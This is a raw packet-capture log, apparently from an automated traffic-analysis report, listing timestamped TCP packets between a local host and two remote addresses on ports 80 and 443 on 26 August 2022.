                Aug 26, 2022 00:13:24.600608110 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600647926 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600651026 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600691080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600730896 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600732088 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600860119 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600903988 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600909948 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600945950 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600985050 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.601010084 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.710966110 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711025000 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711039066 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711066961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711108923 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711110115 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711150885 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711163998 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711189985 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711216927 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711230040 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711230993 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711271048 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711286068 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711321115 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711419106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711461067 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711473942 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711509943 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821609974 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821674109 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821715117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821755886 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821769953 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821820021 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821822882 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821824074 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821826935 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821866035 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821868896 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821909904 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821912050 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821950912 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821973085 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821990013 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.822030067 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.823461056 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.931772947 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.931842089 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.931895018 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.931902885 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.931950092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.932002068 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.932015896 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.932061911 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.932115078 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.042335033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042357922 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042375088 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042391062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042411089 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042428017 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.042448044 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042457104 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.042505980 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042560101 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152775049 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152815104 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152837038 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152854919 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152859926 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152882099 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152899981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152905941 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152930975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152950048 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152952909 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.153007030 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261147022 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261185884 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261212111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261239052 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261256933 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261269093 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261291981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261296034 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261324883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261352062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261359930 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261379957 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261409998 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.370843887 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.370912075 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.370928049 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.370978117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371021986 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371054888 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.371062040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371100903 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371146917 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371167898 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.371187925 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371227980 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371270895 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.480748892 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480792999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480814934 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480819941 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.480840921 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480858088 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.480865955 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480907917 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.480928898 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480957031 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480982065 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.480998993 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.481008053 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.481048107 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.589235067 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589288950 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589328051 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589339972 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.589370012 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589410067 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589421034 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.589448929 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589488029 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589489937 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.589526892 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589567900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589570045 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.589607954 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.589653969 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699038029 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699078083 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699103117 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699105024 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699129105 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699130058 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699147940 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699153900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699182034 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699183941 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699196100 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699208975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699234962 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699234962 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699259043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699260950 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699290037 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699296951 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699330091 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699372053 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.699384928 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.699435949 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.808734894 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.808785915 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.808814049 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.808844090 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.808845043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.808881998 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.808913946 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.808914900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.808975935 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.808999062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.809290886 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.809339046 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.809411049 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.809695005 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.809745073 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.917130947 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917197943 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917262077 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.917295933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917339087 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917397976 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.917815924 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917859077 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917903900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.917922020 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.027256966 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.027375937 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.027410984 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.027487993 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.027561903 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.027574062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.028362989 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.028441906 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.029010057 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.029086113 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.029154062 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.137089968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.137126923 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.137145996 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.137159109 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.137207985 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.138107061 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.138134956 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.138186932 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.138433933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.138456106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.138495922 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.245418072 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.245446920 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.245464087 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.245481968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.245498896 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.245536089 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.245605946 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.246105909 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.246133089 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.246212006 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.246372938 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.246417999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.246484995 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.354979992 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355010986 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355108023 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.355150938 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355294943 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355320930 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355353117 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.355359077 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355415106 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.355808973 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355844975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.355894089 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.355926991 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467438936 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467540979 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467586994 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467628002 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467637062 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467667103 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467673063 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467684031 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467693090 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467710972 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467734098 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467750072 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467778921 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467788935 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467828989 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.467828989 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.467852116 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.468281031 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.578393936 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.578453064 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.578478098 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.578514099 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.578572035 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.578587055 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.578671932 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.578716040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.578756094 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.578766108 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.579054117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.579097033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.579113960 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.688503027 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.688676119 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.688702106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.688716888 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.688792944 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.688860893 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.689033031 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.689199924 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.798424006 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798460007 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798484087 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798501968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798518896 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798649073 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.798692942 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.798839092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798865080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.798989058 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.908463001 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.908535957 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.908595085 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.908648968 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.908648968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.908690929 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.908704996 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.908759117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:26.908788919 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.908801079 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:26.908819914 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:27.018963099 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:27.019040108 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:27.019098043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:27.019143105 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:27.019197941 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:27.019176960 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:27.019237995 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:27.019243956 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:27.019248962 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:27.019262075 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:27.023567915 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:28.580370903 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:28.580419064 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:28.580472946 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:28.601269007 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:28.601303101 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:28.707530975 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:28.707698107 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:28.716379881 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:28.716411114 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:28.717185974 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:28.923373938 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:28.923470974 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:28.969888926 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:29.011358023 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:29.020800114 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:29.020951033 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:29.021039009 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:29.021074057 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:29.021100998 CEST44349175194.247.196.66192.168.2.22
                Aug 26, 2022 00:13:29.021543980 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:29.022427082 CEST49175443192.168.2.22194.247.196.66
                Aug 26, 2022 00:13:31.909153938 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:32.129957914 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:32.596546888 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:32.701278925 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:32.809475899 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.034890890 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.142919064 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.142946959 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.143035889 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.251136065 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.251169920 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.251252890 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.251280069 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.359374046 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.359409094 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.359426022 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.359482050 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.467674971 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.467710018 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.467726946 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.467802048 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.468698025 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.576093912 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.576122999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.576139927 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.576256037 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.576791048 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.576859951 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.576919079 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.684402943 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.684436083 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.684453011 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.684494972 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:33.684545040 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:33.684575081 CEST4917480192.168.2.22209.127.20.13
